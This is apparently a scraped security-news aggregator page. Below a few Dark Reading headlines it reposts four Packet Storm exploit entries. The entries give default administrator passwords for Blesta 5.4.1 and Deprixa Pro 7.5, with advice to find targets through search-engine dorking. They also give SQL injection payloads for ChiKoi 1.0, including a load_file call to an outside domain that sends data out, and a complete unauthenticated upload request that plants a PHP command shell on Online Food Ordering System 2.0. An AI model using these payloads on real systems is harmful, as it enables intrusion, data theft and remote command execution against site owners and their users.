Dark Reading: Attacks/Breaches
Securing the World's Energy Systems: Where Physical Security and Cybersecurity Must Meet
Energy has become the new battleground for both physical and cyber security warfare, driven by nation state actors, increasing financial rewards for ransomware gangs and decentralized devices. Chris Price reports.
Securing the World's Energy Systems: Where Physical Security and Cybersecurity Must Meet
Energy has become the new battleground for both physical and cyber security warfare, driven by nation state actors, increasing financial rewards for ransomware gangs and decentralized devices. Chris Price reports.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Man Sentenced for Role in International Telemarketing Scheme
Man Sentenced for Role in International Telemarketing Scheme
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Hacker Space Rogue to Release Book on Hacking Group L0pht Heavy Industries in February
Space Rogue gives a behind the scenes look at the famous hacking group, their senate testimony, and how their legacy continues to shape the security of the online world today.
Hacker Space Rogue to Release Book on Hacking Group L0pht Heavy Industries in February
Space Rogue gives a behind the scenes look at the famous hacking group, their senate testimony, and how their legacy continues to shape the security of the online world today.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Blesta 5.4.1 Insecure Settings
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Blesta version 5.4.1 appears to leave a default administrative account in place post installation.
SHA-256 |
Download
Source:packetstormsecurity.com
Blesta 5.4.1 Insecure Settings
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Blesta version 5.4.1 appears to leave a default administrative account in place post installation.
SHA-256 |
098039ff6d83508ece4f6f823ca46d76e4703e381d3cb13f5c1cb49fc6fa5998Download
====================================================================================================================================
| # Title : blesta 5.4.1 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) |
| # Vendor : https://account.blesta.com/client/plugin/download_manager/client_main/download/209/blesta-5.4.1.zip |
| # Dork : Powered by Blesta, © Phillips Data, Inc. |
====================================================================================================================================
poc :
[+] The vulnerability is about leaving the default settings
During the installation of the script and using the default username and password
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : user=admin & pass=password
[+] https://127.0.0.1/blesta/admin/login/
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ChiKoi 1.0 SQL Injection
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
ChiKoi 1.0 SQL Injection
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
bfbead85273eb8f3029c1797266638fcaaa8f9debd43ae379274799ca7ac9e7fDownload
## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'
was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can steal all information from this system and can
seriously harm the users of this system,
such as extracting bank accounts through which they pay each other, etc.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Food Ordering System 2.0 Shell Upload
https://4.bp.blogspot.com/-our8kmhncnY/WWlvTk7Dk6I/AAAAAAAAINs/ofoeVvTLCzkScTt1I86TmBZptlym-DdFACLcBGAs/s1600/h42.png
Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
Online Food Ordering System 2.0 Shell Upload
https://4.bp.blogspot.com/-our8kmhncnY/WWlvTk7Dk6I/AAAAAAAAINs/ofoeVvTLCzkScTt1I86TmBZptlym-DdFACLcBGAs/s1600/h42.png
Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.
SHA-256 |
ed85146f24b10099cae57f78d6acaf8386a62cc901158ad0489e271b7f3389abDownload
# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/11/2023
# Exploit Author: Onurcan Alcan
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code
# Version: 2.0
# Tested on: Macos / XAMPP
############## Unauthenticated File Upload Request ##############
POST /fos/admin/ajax.php?action=save_menu HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------38679779537855109463517942658
Content-Length: 1225
Origin: http://localhost
Connection: close
Referer: http://localhost/fos/admin/index.php?page=menu
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="id"
1
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="name"
Diet Coke
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="description"
In Can
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="status"
on
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="category_id"
3
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="price"
20
-----------------------------38679779537855109463517942658
Content-Disposition: form-data; name="img"; filename="revcmd.php"
Content-Type: text/php
?>
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
-----------------------------38679779537855109463517942658--
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Deprixa Pro 7.5 Insecure Settings
https://2.bp.blogspot.com/-eFdyzozIeoQ/WWlvJBrapBI/AAAAAAAAIL0/M7DCjoWzT04QjJ3gTxRIZh_KH17rlqHhwCLcBGAs/s1600/h146.png
Deprixa Pro version 7.5 appears to leave a default administrative account in place post installation.
SHA-256 |
Download
Source:packetstormsecurity.com
Deprixa Pro 7.5 Insecure Settings
https://2.bp.blogspot.com/-eFdyzozIeoQ/WWlvJBrapBI/AAAAAAAAIL0/M7DCjoWzT04QjJ3gTxRIZh_KH17rlqHhwCLcBGAs/s1600/h146.png
Deprixa Pro version 7.5 appears to leave a default administrative account in place post installation.
SHA-256 |
b745d80d10a9cf6d74df71babb3f62d563da0d1354d488a4dcf9a6cf6d6e79deDownload
====================================================================================================================================
| # Title : DEPRIXA Pro V7.5 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) |
| # Vendor : https://deprixacargo.link/ |
| # Dork : |
====================================================================================================================================
poc :
[+] The vulnerability is about leaving the default settings
During the installation of the script and using the default username and password
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : user=admin & pass=09731
[+] https://127.0.0.1/deprixaprosite/demo/login.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================
Source:packetstormsecurity.com